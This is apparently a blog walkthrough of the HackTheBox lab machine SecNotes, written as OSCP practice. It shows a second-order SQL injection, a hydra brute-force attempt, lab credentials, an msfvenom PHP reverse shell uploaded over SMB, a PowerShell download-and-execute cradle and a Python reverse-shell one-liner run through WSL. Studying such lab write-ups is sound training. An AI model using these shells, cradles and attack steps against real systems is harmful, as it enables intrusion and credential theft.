SecNotes is a tough box and its creator is none other than 0xdf, who apart from IppSec provides some really good HTB walkthroughs. This box is notable because its intended exploitation route is a client-side exploit (ie. requiring user action automated by script) but an unintended route (like Postman) was far more educational, although I’m not certain if that is in the scope of the PWK/OSCP. Because of this, the post below will cover just the unintended route.
Side note, when I did this box I wasn’t alone so some of the scans showed stuff that shouldn’t be there.
Lessons learned
- 2nd order SQL injection
- Enumerating with Powershell instead of cmd
- Windows subsystem on Linux
nmap error during enumeration
I encountered a strange nmap problem. If you got this error, follow these steps and replace nselib/smb.lua and scripts/smb-ls.nse to fix it.
nmap: nse_nsock.cc:369: void callback(nsock_pool, nsock_event, void*): Assertion `lua_status(L) == LUA_YIELD' failed.
Enumeration
Three ports are open, 80, 445 and 8808. 8808 is unusual for Web port to running.
SMB 445
Checking for null shares found nothing
root@Kali:~/HTB/SecNotes# smbmap -H 10.10.10.97
[+] Finding open SMB ports....
[!] Authentication error occured
[!] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
[!] Authentication error on 10.10.10.97
root@Kali:~/HTB/SecNotes# smbclient --no-pass -L //10.10.10.97
WARNING: The "syslog" option is deprecated
WARNING: The "syslog" option is deprecated
session setup failed: NT_STATUS_ACCESS_DENIED
Web 8808
Let’s check 8808 next. Landing page is the default IIS page.
dirbuster
nikto found nothing unusual, so let’s look at dirbuster.
shell.php is found but that’s not supposed to be there (I checked and it was one of Kali’s default Webshells) so technically there’s nothing on 8808. Moving on.
Web 80
The landing page is a login page.
Tested some default creds like
- admin:admin
- administrator:password
which all failed. Also tried testing for SQL vulnerability with ' or 1=1;-- - unsuccessfully.
dirbuster
Interestingly dirbuster found a bunch of php pages.
But they were all inaccessible or directed to the login page. Back to login.php, let’s try to create an account.
I tried SQLi bypass here but nothing seemed to happen. Logging in with this account we see
Here we see a user tyler, and the hostname secnotes.htb which I added to /etc/hosts. These may come in useful later. We can create new notes as follows.
They don’t seem to do anything though. The intended exploitation path here would need you to test if XSS was possible, and if so hint to you that this was a possible vector. But I ignored all client-side exploits so I missed that. Instead I tried a simple PHP payload which simply got printed without execution.
Going to Contact Us showed this
I tried some messages but nothing seemed to happen.
Bruteforcing logins
At this point I went back to login.php and realised that entering garbage input for usernames returned the message
No account found with that username.
but if we provide a valid username such as the one we created or tyler we see instead
The password you entered was not valid.
I tried bruteforcing with hydra to find possible passwords with rockyou.txt but got this error. It returned a valid blank password.
root@Kali:~/HTB/SecNotes# hydra -l tyler -P /usr/share/wordlists/rockyou.txt secnotes.htb http-post-form "/login.php :username=^USER^&password=^PASS^:F=password you entered was not valid:H=User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv\:60.0) Gecko/20100101 Firefox/60.0:H=Referer: http\://secnotes.htb/login.php:H=Cookie: PHPSESSID=qft12pmknvvdorjjhk95a69nlq" -v -f -I Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-10-11 10:19:54 [INFORMATION] escape sequence \: detected in module option, no parameter verification is performed. [WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking http-post-form://secnotes.htb:80/login.php :username=^USER^&password=^PASS^:F=password you entered was not valid:H=User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv\:60.0) Gecko/20100101 Firefox/60.0:H=Referer: http\://secnotes.htb/login.php:H=Cookie: PHPSESSID=qft12pmknvvdorjjhk95a69nlq [VERBOSE] Resolving addresses ... [VERBOSE] resolving done [STATUS] 450.00 tries/min, 450 tries in 00:01h, 14343949 to do in 531:16h, 16 active [STATUS] 429.67 tries/min, 1289 tries in 00:03h, 14343110 to do in 556:22h, 16 active [STATUS] 415.00 tries/min, 2905 tries in 00:07h, 14341494 to do in 575:58h, 16 active [80][http-post-form] host: secnotes.htb login: tyler [STATUS] attack finished for secnotes.htb (valid pair found) 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-10-11 10:31:31
Some Googling showed there was something wrong with the rockyou.txt file since it had blank lines and these when tested, returned a different error message (please enter a password) so hydra thought it was successful. Important lesson learned but one that doesn’t help us here. I abandoned this after reading the forum hints that bruteforcing wasn’t needed.
Second-order SQL injection
Now this is new to me. I didn’t manage to solve it but to do so you first need to understand what is a second order SQLi. This page explains it well together with example 2 of this article. In essence, a 1st order SQLi is when you achieve SQL RCE with entering input and getting a response immediately but a 2nd order SQLi happens when the RCE is triggered not as a response to the injected input but by some later downstream process which calls on the injected commands and executes them
Why doesn’t it work the first time round? Typically its because input directly from the user isn’t trusted and instead vetted and sanitised but input from an internal source such as a database are trusted when it shouldn’t be. To pull off the 2nd order injection first we need to create a username with the SQLi payload ' or 1=1-- - or any other SQLi bypass.
Once created we login and see
That look like some creds. Since this is Windows and SSH isn’t running we can try to see if it has SMB share access privileges. For how exactly the second-order SQLi works, refer to here.
Enumerating SMB share as tyler
root@Kali:~/HTB/SecNotes# smbmap -u 'tyler' -p '92g!mA8BGjOirkL%OG*&' -H secnotes.htb [+] Finding open SMB ports.... [+] User SMB session establishd on secnotes.htb... [+] IP: secnotes.htb:445 Name: secnotes.htb Disk Permissions ---- ----------- ADMIN$ NO ACCESS C$ NO ACCESS IPC$ READ ONLY new-site READ, WRITE
We are able to see something new here, specifically new-site. I checked the default readable IPC$ share but didn’t find anything interesting. Enumerating the new-site share we see
root@Kali:~/HTB/SecNotes# smbmap -u 'tyler' -p '92g!mA8BGjOirkL%OG*&' -H secnotes.htb -R new-site [+] Finding open SMB ports.... [+] User SMB session establishd on secnotes.htb... [+] IP: secnotes.htb:445 Name: secnotes.htb Disk Permissions ---- ----------- new-site READ, WRITE .\ dr--r--r-- 0 Sun Oct 11 13:59:31 2020 . dr--r--r-- 0 Sun Oct 11 13:59:31 2020 .. -r--r--r-- 696 Fri Jun 22 04:15:36 2018 iisstart.htm -r--r--r-- 98757 Fri Jun 22 04:15:38 2018 iisstart.png dr--r--r-- 0 Sun Oct 11 04:31:31 2020 Microsoft -r--r--r-- 35 Sun Oct 11 05:09:30 2020 shell.php .\\Microsoft\ dr--r--r-- 0 Sun Oct 11 04:31:31 2020 . dr--r--r-- 0 Sun Oct 11 04:31:31 2020 .. dr--r--r-- 0 Sun Oct 11 04:31:31 2020 Windows .\\Microsoft\Windows\ dr--r--r-- 0 Sun Oct 11 04:31:31 2020 . dr--r--r-- 0 Sun Oct 11 04:31:31 2020 .. dr--r--r-- 0 Sun Oct 11 04:31:31 2020 PowerShell .\\Microsoft\Windows\PowerShell\ dr--r--r-- 0 Sun Oct 11 04:31:31 2020 . dr--r--r-- 0 Sun Oct 11 04:31:31 2020 .. -r--r--r-- 58407 Sun Oct 11 05:41:56 2020 ModuleAnalysisCache
Ok shell.php isn’t supposed to be there, but iistart.htm is. Since we can see this page and write to this directory maybe we can get a PHP shell on Web port 8808?
PHP reverse shell
Let’s first get a PHP reverse shell with msfvenom
root@Kali:~/HTB/SecNotes# msfvenom -a php --platform php -p php/reverse_php LHOST=10.10.14.78 LPORT=443 -f raw -o shell443.php No encoder specified, outputting raw payload Payload size: 3025 bytes Saved as: shell443.php
and upload it
root@Kali:~/HTB/SecNotes# smbclient -U 'tyler' \\\\secnotes.htb\\new-site WARNING: The "syslog" option is deprecated WARNING: The "syslog" option is deprecated Enter WORKGROUP\tyler's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Mon Aug 20 02:06:14 2018 .. D 0 Mon Aug 20 02:06:14 2018 iisstart.htm A 696 Thu Jun 21 23:26:03 2018 iisstart.png A 98757 Thu Jun 21 23:26:03 2018 12978687 blocks of size 4096. 8089826 blocks available smb: \> put shell443.php putting file shell443.php as \shell443.php (32.9 kb/s) (average 32.9 kb/s) smb: \> exit
Trigger it with curl
root@Kali:~/HTB/SecNotes# curl http://secnotes.htb:8808/shell443.php
and we get a cmd shell
root@Kali:~/HTB/SecNotes# rlwrap -r nc -nlvp 443 listening on [any] 443 ... connect to [10.10.14.78] from (UNKNOWN) [10.10.10.97] 62606 whoami && ipconfig secnotes\tyler Windows IP Configuration Ethernet adapter Ethernet0: Connection-specific DNS Suffix . : IPv4 Address. . . . . . . . . . . : 10.10.10.97 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 10.10.10.2
However, this shell dies somewhat quickly so its imperative to either upload nc.exe and run that or get a Powershell reverse shell. I opted for the PS reverse shell. I had nishang’s PS script ready (renamed it rshell.ps1, removed all comments and added a line to execute it) and ran this in the PHP shell
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.78/rshell.ps1')"
This downloaded the script from our Python server
root@Kali:~/HTB/SecNotes# python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.97 - - [11/Oct/2020 14:19:02] "GET /rshell.ps1 HTTP/1.1" 200 -
and got a PS reverse shell
root@Kali:~/HTB/SecNotes# rlwrap -r nc -nlvp 443 listening on [any] 443 ... connect to [10.10.14.78] from (UNKNOWN) [10.10.10.97] 62612 Windows PowerShell running as user SECNOTES$ on SECNOTES Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\inetpub\new-site>
Now let’s check the .NET Framework version to see which winPEAS version should be run.
PS C:\inetpub\new-site> dir C:\Windows\Microsoft.NET\Framework
Directory: C:\Windows\Microsoft.NET\Framework
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/21/2018 6:47 PM v1.0.3705
d----- 6/21/2018 6:47 PM v1.1.4322
d----- 4/11/2018 4:38 PM v2.0.50727
d----- 10/10/2020 12:52 PM v4.0.30319
-a---- 4/11/2018 4:33 PM 7680 sbscmp10.dll
-a---- 4/11/2018 4:33 PM 7680 sbscmp20_mscorwks.dll
-a---- 4/11/2018 4:33 PM 7680 sbscmp20_perfcounter.dll
-a---- 4/11/2018 4:33 PM 7680 sbs_diasymreader.dll
-a---- 4/11/2018 4:33 PM 7680 sbs_microsoft.jscript.dll
-a---- 4/11/2018 4:33 PM 7680 sbs_mscordbi.dll
-a---- 4/11/2018 4:33 PM 7680 sbs_mscorrc.dll
-a---- 4/11/2018 4:33 PM 7680 sbs_mscorsec.dll
-a---- 4/11/2018 4:33 PM 7680 sbs_system.configuration.install.dll
-a---- 4/11/2018 4:33 PM 7680 sbs_system.data.dll
-a---- 4/11/2018 4:33 PM 7680 sbs_system.enterpriseservices.dll
-a---- 4/11/2018 4:33 PM 7680 sbs_wminet_utils.dll
-a---- 4/11/2018 4:33 PM 7680 SharedReg12.dll
Not 4.5 so we can’t use the latest winPEAS. An older compiled version should work.
Failed winPEAS.exe download via FTP
To get winPEAS.exe onto the box I first tried using the Windows FTP client method to download from Kali-hosted FTP as shown here. However, I encountered two problems. Firstly for some reason it didn’t allow me to download exe files over FTP, deeming it as virus. Secondly, I got the error
421 Active data channel timed out.
These issues are explored here. Ultimately, what worked was using Powershell’s DownloadFile method.
PS C:\Users\tyler\Temp> (New-Object Net.WebClient).DownloadFile('http://10.10.14.78/winPEASx64.exe','C:\Users\tyler\Temp\winPEASx64.exe')
PS C:\users\tyler\Temp> .\winPEASx64.exe cmd > output.txt
PS C:\users\tyler\Temp> dir output.txt
Directory: C:\users\tyler\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/11/2020 12:38 AM 106530 output.txt
Unfortunately, winpeas didn’t find anything notable. Next I tried PowerUp.ps1 and PrivescCheck. To run both scripts in a PS shell change the execution policy then import the modules from the scripts.
PS C:\Users\tyler\Temp> Set-ExecutionPolicy Bypass -Scope process -Force PS C:\users\tyler\Temp> Import-Module C:\users\tyler\Temp\PowerUp.ps1
PowerUp couldn’t open run the Service Control Manager and as a result had no output.
PS C:\Users\tyler\Temp> Invoke-AllChecks | Tee-Object "powerup.txt"
PS C:\Users\tyler\Temp> rshell : Cannot open Service Control Manager on computer '.'. This operation might require other privileges.
At line:90 char:1
+ rshell -Reverse -IPAddress 10.10.14.78 -Port 443
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorException
+ FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,rshell
PS C:\Users\tyler\Temp> type powerup.txt
[*] Running Invoke-AllChecks
[*] Checking if user is in a local group with administrative privileges...
[*] Checking for unquoted service paths...
[*] Checking service executable and argument permissions...
[*] Checking service permissions...
PrivescCheck couldn’t even be imported.
PS C:\users\tyler\Temp> Import-Module C:\users\tyler\Temp\PrivescCheck.ps1
PS C:\users\tyler\Temp> Add-Type : Cannot add type. Compilation errors occurred.
At C:\users\tyler\Temp\PrivescCheck.ps1:382 char:5
+ Add-Type -MemberDefinition $CSharpSource -Name 'Win32' -Namespace ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidData: (:) [Add-Type], InvalidOperationException
+ FullyQualifiedErrorId : COMPILER_ERRORS,Microsoft.PowerShell.Commands.AddTypeCommand
Running services restricted from outside
Normally I check those port numbers below 10,000, higher up tends to be RPC which typically don’t lead anywhere. We see
TCP 0.0.0.0:3306 Listening
which tell us some SQL instance is running in the list of running services
MySQL80(MySQL80)["C:\Program Files\MySQL\MySQL Server 8.0\bin\mysqld.exe" --defaults-file="C:\ProgramData\MySQL\MySQL Server 8.0\my.ini" MySQL80] - Autoload
As it led nowhere I won’t cover it here. Refer to this for more information.
Checking for password reuse
With the credentials obtained, I checked to see if the Administrator password reused either tyler’s or the one in the MySQL DB. Nothing.
Enumerating with Powershell
For this box I enumerated mostly using Powershell since we have a PS shell. A couple of things to check out. To list all files/folders including hidden ones in Powershell instead of dir /a we do this
PS C:\Users\tyler\Recent> dir : Access to the path 'C:\Users\tyler\Recent' is denied.
At line:1 char:1
+ dir -Force
+ ~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Users\tyler\Recent:String) [Get-ChildItem], UnauthorizedAccessExce
ption
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
Strangely it is blocked. But when I dropped an nc shell, I saw Recent was a junction link and was able to follow it to a path where I could list its contents.
C:\Users\tyler>cd C:\Users\tyler\AppData\Roaming\Microsoft\Windows\Recent
cd C:\Users\tyler\AppData\Roaming\Microsoft\Windows\Recent
C:\Users\tyler\AppData\Roaming\Microsoft\Windows\Recent>dir /a
dir /a
Volume in drive C has no label.
Volume Serial Number is 9CDD-BADA
Directory of C:\Users\tyler\AppData\Roaming\Microsoft\Windows\Recent
08/19/2018 11:08 AM <DIR> .
08/19/2018 11:08 AM <DIR> ..
06/21/2018 09:55 AM 971 753af751b8be45e9cd250078982d8924caa22b89.lnk
08/19/2018 09:56 AM <DIR> AutomaticDestinations
08/19/2018 11:05 AM 804 bla.lnk
08/19/2018 11:05 AM 804 blu.lnk
06/22/2018 03:48 AM 799 change_pass.php.lnk
06/22/2018 01:51 PM 849 check-messages.lnk
08/19/2018 11:08 AM 694 cleanup (2).lnk
08/19/2018 11:08 AM 514 cleanup.lnk
10/10/2020 12:45 PM <DIR> CustomDestinations
08/19/2018 03:51 PM 432 desktop.ini
06/22/2018 02:16 PM 797 Desktop.lnk
06/22/2018 03:40 AM 808 etc.lnk
06/21/2018 02:16 PM 760 home.php.lnk
06/22/2018 03:40 AM 970 hosts.lnk
08/19/2018 09:28 AM 206 http--go.microsoft.com-fwlink-LinkID=626473.lnk
08/19/2018 09:29 AM 154 ms-settingsnetwork.lnk
06/22/2018 07:28 PM 1,662 New folder.lnk
08/19/2018 11:05 AM 655 new-site.lnk
06/22/2018 03:47 AM 784 register.php.lnk
06/22/2018 02:16 PM 976 root.lnk
06/22/2018 07:28 PM 1,556 secnotes (VBOXSVR) (2).lnk
06/22/2018 07:28 PM 1,556 secnotes (VBOXSVR).lnk
06/22/2018 01:51 PM 612 secnotes_contacts.lnk
06/21/2018 02:23 PM 1,729 startup.cmd.lnk
06/21/2018 02:23 PM 1,419 Startup.lnk
08/19/2018 11:02 AM 811 test.lnk
08/19/2018 10:51 AM 104 The Internet.lnk
06/21/2018 09:39 AM 1,707 tyler-secnotes_contacts.lnk
08/19/2018 10:54 AM 545 tyler.lnk
08/19/2018 09:22 AM 527 user.lnk
06/22/2018 02:11 PM 551 user.txt.lnk
08/19/2018 10:54 AM 465 Users.lnk
08/19/2018 09:56 AM 154 windowsdefender---.lnk
08/19/2018 09:57 AM 166 windowsdefender--threat-.lnk
06/22/2018 03:48 AM 605 wwwroot.lnk
06/21/2018 06:11 PM 1,960 xxxtxxx.lnk
34 File(s) 28,106 bytes
4 Dir(s) 33,114,161,152 bytes free
I checked a few of these shortcut files to see if they linked anywhere interesting but got nowhere. Nevermind. To check permissions of files/folders instead of icacls in cmd we do either
PS C:\inetpub\temp> Get-Acl C:\Users\tyler | Select-Object -ExpandProperty Access FileSystemRights : FullControl AccessControlType : Allow IdentityReference : NT AUTHORITY\SYSTEM IsInherited : False InheritanceFlags : ContainerInherit, ObjectInherit PropagationFlags : None FileSystemRights : FullControl AccessControlType : Allow IdentityReference : BUILTIN\Administrators IsInherited : False InheritanceFlags : ContainerInherit, ObjectInherit PropagationFlags : None FileSystemRights : FullControl AccessControlType : Allow IdentityReference : SECNOTES\tyler IsInherited : False InheritanceFlags : ContainerInherit, ObjectInherit PropagationFlags : None
but that isn’t really readable. A more readable alternative is
PS C:\inetpub\temp> Get-Acl C:\Users\tyler | Select -Expand AccessToString NT AUTHORITY\SYSTEM Allow FullControl BUILTIN\Administrators Allow FullControl SECNOTES\tyler Allow FullControl
Like icacls however, if we don’t have permissions to check its object permissions we still get an error.
PS C:\inetpub\temp> rshell : Attempted to perform an unauthorized operation.
At line:90 char:1
+ rshell -Reverse -IPAddress 10.10.14.78 -Port 443
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorException
+ FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,rshell
The command entered was replaced by the above error, but it was
Get-Acl C:\Users\Administrator | Select -Expand AccessToString
If we check permissions for C:\Windows instead which we can read we see
PS C:\inetpub\temp> Get-Acl C:\Windows | Select -Expand AccessToString CREATOR OWNER Allow 268435456 NT AUTHORITY\SYSTEM Allow 268435456 NT AUTHORITY\SYSTEM Allow Modify, Synchronize BUILTIN\Administrators Allow 268435456 BUILTIN\Administrators Allow Modify, Synchronize BUILTIN\Users Allow -1610612736 BUILTIN\Users Allow ReadAndExecute, Synchronize NT SERVICE\TrustedInstaller Allow 268435456 NT SERVICE\TrustedInstaller Allow FullControl APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow -1610612736 APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow -1610612736
One thing to note here, is that unlike Bash, Powershell won’t tell you if a given sub-directory doesn’t exist. This is unlike in Traverxec where back then we could enter david’s home directory, check that there’s a .ssh folder which we couldn’t access. Powershell just tells you the path doesn’t exist, even though it does.
PS C:\users> Get-Acl C:\Users\Administrator\Desktop | Select -Expand AccessToString
PS C:\users> Get-Acl : Cannot find path 'C:\Users\Administrator\Desktop' because it does not exist.
At line:1 char:1
+ Get-Acl C:\Users\Administrator\Desktop | Select -Expand AccessToStrin ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (:) [Get-Acl], ItemNotFoundException
+ FullyQualifiedErrorId : GetAcl_PathNotFound_Exception,Microsoft.PowerShell.Commands.GetAclCommand
In Powershell, net user comes out as
PS C:\$Recycle.Bin> Get-LocalUser | Select *
AccountExpires :
Description : Built-in account for administering the computer/domain
Enabled : True
FullName :
PasswordChangeableDate : 6/21/2018 12:59:29 PM
PasswordExpires :
UserMayChangePassword : True
PasswordRequired : True
PasswordLastSet : 6/21/2018 12:59:29 PM
LastLogon : 8/19/2018 11:11:34 AM
Name : Administrator
SID : S-1-5-21-1791094074-1363918840-4199337083-500
PrincipalSource : Local
ObjectClass : User
AccountExpires :
Description : A user account managed by the system.
Enabled : False
FullName :
PasswordChangeableDate :
PasswordExpires :
UserMayChangePassword : True
PasswordRequired : False
PasswordLastSet :
LastLogon :
Name : DefaultAccount
SID : S-1-5-21-1791094074-1363918840-4199337083-503
PrincipalSource : Local
ObjectClass : User
AccountExpires :
Description : Built-in account for guest access to the computer/domain
Enabled : False
FullName :
PasswordChangeableDate :
PasswordExpires :
UserMayChangePassword : False
PasswordRequired : False
PasswordLastSet :
LastLogon :
Name : Guest
SID : S-1-5-21-1791094074-1363918840-4199337083-501
PrincipalSource : Local
ObjectClass : User
AccountExpires :
Description :
Enabled : True
FullName :
PasswordChangeableDate : 6/21/2018 12:58:00 PM
PasswordExpires :
UserMayChangePassword : False
PasswordRequired : False
PasswordLastSet : 6/21/2018 12:58:00 PM
LastLogon : 10/12/2020 9:11:26 AM
Name : tyler
SID : S-1-5-21-1791094074-1363918840-4199337083-1002
PrincipalSource : Local
ObjectClass : User
AccountExpires :
Description : A user account managed and used by the system for Windows Defender Application Guard
scenarios.
Enabled : False
FullName :
PasswordChangeableDate : 6/21/2018 5:47:42 PM
PasswordExpires : 8/2/2018 5:47:42 PM
UserMayChangePassword : True
PasswordRequired : True
PasswordLastSet : 6/21/2018 5:47:42 PM
LastLogon :
Name : WDAGUtilityAccount
SID : S-1-5-21-1791094074-1363918840-4199337083-504
PrincipalSource : Local
ObjectClass : User
which also lists their respective SIDs. I also enumerated the Recycle Bin to check if there was any credentials, but since that didn’t proceed anywhere you can read about it here.
Enumerating non-Windows programs
If you looked at tyler’s desktop you’ll see this non-standard non-Windows shortcut to Bash.
C:\Users\tyler\Desktop>dir /a
dir /a
Volume in drive C has no label.
Volume Serial Number is 9CDD-BADA
Directory of C:\Users\tyler\Desktop
08/19/2018 03:51 PM <DIR> .
08/19/2018 03:51 PM <DIR> ..
06/22/2018 03:09 AM 1,293 bash.lnk
04/11/2018 04:34 PM 1,142 Command Prompt.lnk
08/19/2018 03:51 PM 572 desktop.ini
04/11/2018 04:34 PM 407 File Explorer.lnk
06/21/2018 05:50 PM 1,417 Microsoft Edge.lnk
06/21/2018 09:17 AM 1,110 Notepad++.lnk
08/19/2018 09:25 AM 34 user.txt
08/19/2018 10:59 AM 2,494 Windows PowerShell.lnk
8 File(s) 8,469 bytes
2 Dir(s) 33,114,161,152 bytes free
The root directory also show there’s a C:\Distros\Ubuntu for which we have executable rights.
PS C:\Distros> dir -Force
Directory: C:\Distros
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/21/2018 5:59 PM Ubuntu
PS C:\Distros\Ubuntu> dir -Force
Directory: C:\Distros\Ubuntu
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/21/2018 3:07 PM AppxMetadata
d----- 6/21/2018 3:07 PM Assets
d----- 6/21/2018 3:07 PM images
d----- 6/21/2018 5:51 PM temp
-a---- 7/11/2017 6:10 PM 190434 AppxBlockMap.xml
-a---- 7/11/2017 6:10 PM 2475 AppxManifest.xml
-a---- 7/11/2017 6:11 PM 10554 AppxSignature.p7x
-a---- 7/11/2017 6:10 PM 201254783 install.tar.gz
-a---- 7/11/2017 6:10 PM 4840 resources.pri
-a---- 7/11/2017 6:10 PM 222208 ubuntu.exe
-a---- 7/11/2017 6:10 PM 809 [Content_Types].xml
PS C:\Distros\Ubuntu> Get-Acl ubuntu.exe | Select -Expand AccessToString
BUILTIN\Administrators Allow FullControl
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Users Allow ReadAndExecute, Synchronize
NT AUTHORITY\Authenticated Users Allow Modify, Synchronize
Windows subsystem for Linux
At this point I checked HackTricks to see if there was anything on this. And there was a section on Linux on Windows. We can confirm both executables exist and any user can run it.
PS C:\Distros\Ubuntu> dir C:\Windows\system32\wsl.exe
Directory: C:\Windows\system32
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/21/2018 3:02 PM 114688 wsl.exe
PS C:\Distros\Ubuntu> dir C:\Windows\system32\bash.exe
Directory: C:\Windows\system32
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/21/2018 3:02 PM 115712 bash.exe
PS C:\Distros\Ubuntu> Get-Acl C:\Windows\system32\wsl.exe | Select -Expand AccessToString
NT AUTHORITY\SYSTEM Allow ReadAndExecute, Synchronize
BUILTIN\Administrators Allow ReadAndExecute, Synchronize
BUILTIN\Users Allow ReadAndExecute, Synchronize
NT SERVICE\TrustedInstaller Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Let’s try to run it and see what Linux user we are on this Linux subsystem
PS C:\Distros\Ubuntu> C:\Windows\system32\wsl.exe whoami root
Great we are root. HackTricks suggest we can try to spawn a Python reverse shell. I found this reference and this screenshot to be useful in getting a shell
PS C:\Distros\Ubuntu> C:\Windows\system32\wsl.exe python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.78',443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn('/bin/bash')"
root@Kali:~/HTB/SecNotes# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.78] from (UNKNOWN) [10.10.10.97] 49745
root@SECNOTES:~# ^Z
[1]+ Stopped nc -nlvp 443
root@Kali:~/HTB/SecNotes# stty raw -echo
root@Kali:~/HTB/SecNotes# nc -nlvp 443
ls
filesystem
root@SECNOTES:~# stty rows 40 columns 150
root@SECNOTES:~# export SHELL=bash
root@SECNOTES:~# export TERM=xterm
root@SECNOTES:~# export LS_OPTIONS='--color=auto'
root@SECNOTES:~# eval "`dircolors`"
root@SECNOTES:~# alias ls='ls $LS_OPTIONS'
root@SECNOTES:~# export PS1='\[\e]0;\u@\h: \w\a\]\[\033[01;32m\]\u@\h\[\033[01;34m\] \w \$\[\033[00m\] '
root@SECNOTES ~ #
Interestingly I could even upgrade my shell to a fully interactive one with colours. Now looking into the root user’s directory in WSL we see
root@SECNOTES ~ # ls -lah total 8.0K drwx------ 1 root root 512 Jun 22 2018 . drwxr-xr-x 1 root root 512 Jun 21 2018 .. ---------- 1 root root 492 Oct 12 10:08 .bash_history -rw-r--r-- 1 root root 3.1K Jun 22 2018 .bashrc -rw-r--r-- 1 root root 148 Aug 17 2015 .profile drwxrwxrwx 1 root root 512 Jun 22 2018 filesystem root@SECNOTES ~ # ls -lah filesystem/ total 0 drwxrwxrwx 1 root root 512 Jun 22 2018 . drwx------ 1 root root 512 Jun 22 2018 ..
and we can check .bash_history to find some creds
root@SECNOTES ~ # cat .bash_history cd /mnt/c/ ls cd Users/ cd / cd ~ ls pwd mkdir filesystem mount //127.0.0.1/c$ filesystem/ sudo apt install cifs-utils mount //127.0.0.1/c$ filesystem/ mount //127.0.0.1/c$ filesystem/ -o user=administrator cat /proc/filesystems sudo modprobe cifs smbclient apt install smbclient smbclient smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$ > .bash_history less .bash_history exitid ls -lah pwd cd \ cd / ls -lah cd /home ls -lah cd /root ls -lah cd filesystem ls -lah exit
Just to confirm we’re not missing any other Bash user let’s confirm only root has a shell on WSL
root@SECNOTES ~ # getent passwd | grep bash root:x:0:0:root:/root:/bin/bash
Now if we didn’t find anything here, then we’d have to enumerate the Linux subsystem as though this were a Linux box. One thing IppSec points out is that you could check the mount with df -h to see if’s mounted the Administrator user folder. It isn’t for this box, just good to know. Alternatively, if we don’t want to get a WSL reverse shell we can also just read root’s .bash_history in Powershell
PS C:\Users\tyler\Appdata\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root> type .bash_history cd /mnt/c/ ls cd Users/ cd / cd ~ ls pwd mkdir filesystem mount //127.0.0.1/c$ filesystem/ sudo apt install cifs-utils mount //127.0.0.1/c$ filesystem/ mount //127.0.0.1/c$ filesystem/ -o user=administrator cat /proc/filesystems sudo modprobe cifs smbclient apt install smbclient smbclient smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$ > .bash_history less .bash_history exitid ls -lah pwd cd \ cd / ls -lah cd /home ls -lah cd /root ls -lah cd filesystem ls -lah exit
Priv esc to SYSTEM
Now we have the creds let’s check what we can access with smbmap
root@Kali:~/HTB/SecNotes# smbmap -u 'Administrator' -p 'u6!4ZwgwOM#^OBf#Nwnh' -H secnotes.htb [+] Finding open SMB ports.... [+] User SMB session establishd on secnotes.htb... [+] IP: secnotes.htb:445 Name: secnotes.htb Disk Permissions ---- ----------- ADMIN$ READ, WRITE C$ READ, WRITE IPC$ READ ONLY new-site NO ACCESS
We have write access to ADMIN$ and C$. Since we are Administrator we should also be able to run SVCManager as well to get a SYSTEM shell.
